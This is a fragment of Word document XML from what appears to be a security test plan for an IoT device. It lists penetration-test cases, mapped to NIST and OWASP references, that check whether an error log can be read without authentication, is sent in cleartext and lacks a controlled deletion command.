          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> No documented erase command </w:t>
      </w:r>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00912080">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> no data-lifecycle control</w:t>
      </w:r>
      <w:r w:rsidR="00626A9E" w:rsidRPr="003C7633">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8A322" w14:textId="54DB38E0" w:rsidR="00552B4D" w:rsidRPr="00F91F55" w:rsidRDefault="00552B4D" w:rsidP="00552B4D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7174B797" w14:textId="77777777" w:rsidR="00552B4D" w:rsidRDefault="00552B4D" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A271550" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156DF986" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DB820E" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7BC1AC" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F70BB71" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B2946B4" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2917990C" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D933E3B" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB4122E" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A17F57C" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDBE27F" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAA4713" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1B7997" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F754E7" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14925252" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03703587" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3E8327" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6373FEEE" w14:textId="77777777" w:rsidR="00512436" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A365A27" w14:textId="77777777" w:rsidR="00512436" w:rsidRPr="00941153" w:rsidRDefault="00512436" w:rsidP="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F44594" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E1694"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5D9557A0"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FD0213E" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E981022"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7AAF9C33"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3E08450B"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5E4D7BDB"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E9503B" w14:paraId="1DD9F67E"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54F7183" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13C28702" w14:textId="79802E9B" w:rsidR="00900880" w:rsidRPr="007F5798" w:rsidRDefault="00E9503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503B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Unauthenticated read: from an arbitrary segment node, read the full error log via IoT-Core with no credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C21817" w14:textId="7B1CAF50" w:rsidR="00900880" w:rsidRPr="007F5798" w:rsidRDefault="00FD3B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D3BA9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1/G-2 (no auth, no purpose-limit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E2F03C7" w14:textId="77777777" w:rsidR="009C14C9" w:rsidRPr="006868A2"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6868A2">
              <w:t xml:space="preserve">NIST SP 800-115 §4.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39230552" w14:textId="717F1960" w:rsidR="00900880" w:rsidRPr="006868A2"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6868A2">
              <w:t xml:space="preserve">OWASP ISTG-DES-AUTHZ-001 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8FE1E6" w14:textId="09A25621" w:rsidR="00900880" w:rsidRPr="007F5798"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SVV-</w:t>
            </w:r>
            <w:r w:rsidR="00065348">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00220D1C" w14:paraId="596E0E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DD2139E" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F47780E" w14:textId="3EE1621A" w:rsidR="00900880" w:rsidRPr="00D258C9" w:rsidRDefault="00220D1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20D1C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cleartext capture: passively capture the log read on the mirror; confirm plaintext + no TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43D57AE4" w14:textId="57A6718A" w:rsidR="00900880" w:rsidRPr="00D258C9" w:rsidRDefault="009F58B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58BE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documents the confidentiality-in-transit observation (DiD; MR-restriction is the primary finding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="024C1597" w14:textId="77777777" w:rsidR="00682EC6"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2EC6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.5; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD85371" w14:textId="63E27915" w:rsidR="00900880" w:rsidRPr="00582DD0"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2EC6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-005 (SSLscan, --show-certificate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5906155A" w14:textId="34C7CD5E" w:rsidR="00900880" w:rsidRPr="00D258C9" w:rsidRDefault="004B2CD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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00463032" w14:paraId="79BC4EC7"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E3EEC17" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EF41A53" w14:textId="3FAB9BE4" w:rsidR="00900880" w:rsidRPr="00D0764E" w:rsidRDefault="0046303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63032">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access-control probe: enumerate the IoT-Core for any auth mechanism, role, or purpose-gate on the log endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A2D89C" w14:textId="1720B03C" w:rsidR="00900880" w:rsidRPr="00D0764E" w:rsidRDefault="00F1413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14135">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-1 (no gate by design)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035CDF9F" w14:textId="54201B33" w:rsidR="00900880" w:rsidRPr="00B11433" w:rsidRDefault="00B1143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0614E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP ISTG-DES-AUTHZ-002;</w:t>
            </w:r>
            <w:r w:rsidRPr="00B11433">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B7401">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-004 (ZAP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CFB8F7C" w14:textId="4316216B" w:rsidR="00900880" w:rsidRPr="00D0764E"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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00E767A0" w14:paraId="4AA85744"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827141D" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3B8510" w14:textId="2CDB71D2" w:rsidR="00900880" w:rsidRPr="00035F89" w:rsidRDefault="00E767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767A0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Deletion-control probe: attempt any delete/erase of log data; confirm no controlled-deletion command exists (only cold-start wipe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C6C7932" w14:textId="3618BE6B" w:rsidR="00900880" w:rsidRPr="00035F89" w:rsidRDefault="004062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062D2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FC3DA8B" w14:textId="77777777" w:rsidR="00964D92" w:rsidRPr="00FE602E"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FE602E">
              <w:t xml:space="preserve">NIST SP 800-115 §4.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187270D2" w14:textId="30177A84" w:rsidR="00900880" w:rsidRPr="00941D2D"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941D2D">
              <w:t>OWASP ISTG-DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="795EF34A" w14:textId="17B4222B" w:rsidR="00900880" w:rsidRPr="00035F89" w:rsidRDefault="002C66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SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F552779" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BAB1F1" w14:textId="3BF40C67" w:rsidR="009C0A46" w:rsidRPr="00E11113" w:rsidRDefault="009C0A46" w:rsidP="00E11113">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8AD24" w14:textId="77777777" w:rsidR="003670E7" w:rsidRDefault="003670E7" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EE222D" w14:textId="7D4561AA" w:rsidR="00E575E1" w:rsidRPr="00E575E1" w:rsidRDefault="00E575E1" w:rsidP="00941D2D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E575E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ014-01 </w:t>
      </w:r>
      <w:r w:rsidR="00AE2C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E575E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unauthenticated Tracing-Log Read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D3138D" w14:textId="6158E24A" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00941D2D">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941D2D" w14:paraId="0B48F3E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A1D566" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24848758" w14:textId="77777777" w:rsidR="00941D2D"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41D2D" w14:paraId="599BD2A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C233A6" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D442067" w14:textId="1479DF2E" w:rsidR="00941D2D" w:rsidRPr="00EC056D" w:rsidRDefault="00D259B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D17A8">
              <w:t>TC-RQ014-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="59D3BCA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EC41B4" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07A180B8" w14:textId="41197309" w:rsidR="00941D2D" w:rsidRPr="001604A0" w:rsidRDefault="001F776C"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1604A0">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-014 → CR 1.1/1.2 / CR 2.1 / CR 3.9 → Asset I, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="2E61C10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F93A25" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3638715D" w14:textId="404CDF53" w:rsidR="00941D2D" w:rsidRPr="00EC056D" w:rsidRDefault="00D67CA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67CA6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Information Disclosure + missing authorization boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w14:paraId="5DC9326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737AF0A" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E430FFD" w14:textId="79F3C5B6" w:rsidR="00941D2D" w:rsidRPr="00EC056D" w:rsidRDefault="005F79A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9A3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="3ED7219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9F7CED" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23884BF8" w14:textId="3F66FDE5" w:rsidR="00941D2D" w:rsidRPr="00EC056D" w:rsidRDefault="002265A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265AF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the tracing (error) log is fully readable by an arbitrary, unauthenticated node on the network segment, with no identity, authentication, authorization, or purpose-limitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="002265AF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> directly violating the requirement that access be restricted exclusively to a competent-authority request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="737C22E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E30760B" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1777F474" w14:textId="77777777" w:rsidR="000F43ED" w:rsidRDefault="000F43E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F43ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. From a node with only network access (no credentials, no configuration privilege), request the error-log endpoint. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61120F12" w14:textId="77777777" w:rsidR="002A22BA" w:rsidRDefault="000F43E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F43ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Confirm the full log content is returned. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5415BAD7" w14:textId="77777777" w:rsidR="00764126" w:rsidRDefault="000F43E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F43ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Confirm no authentication challenge, session, or authorization check is presented at any point. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C9BD9E" w14:textId="0FEB61DB" w:rsidR="00941D2D" w:rsidRPr="00EC056D" w:rsidRDefault="000F43E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F43ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Confirm no purpose/requestor field is required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00941D2D" w:rsidRPr="00EE7A74" w14:paraId="226D5BB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53BCD9" w14:textId="77777777" w:rsidR="00941D2D" w:rsidRDefault="00941D2D" w:rsidP="00655E93">
            <w:pPr>
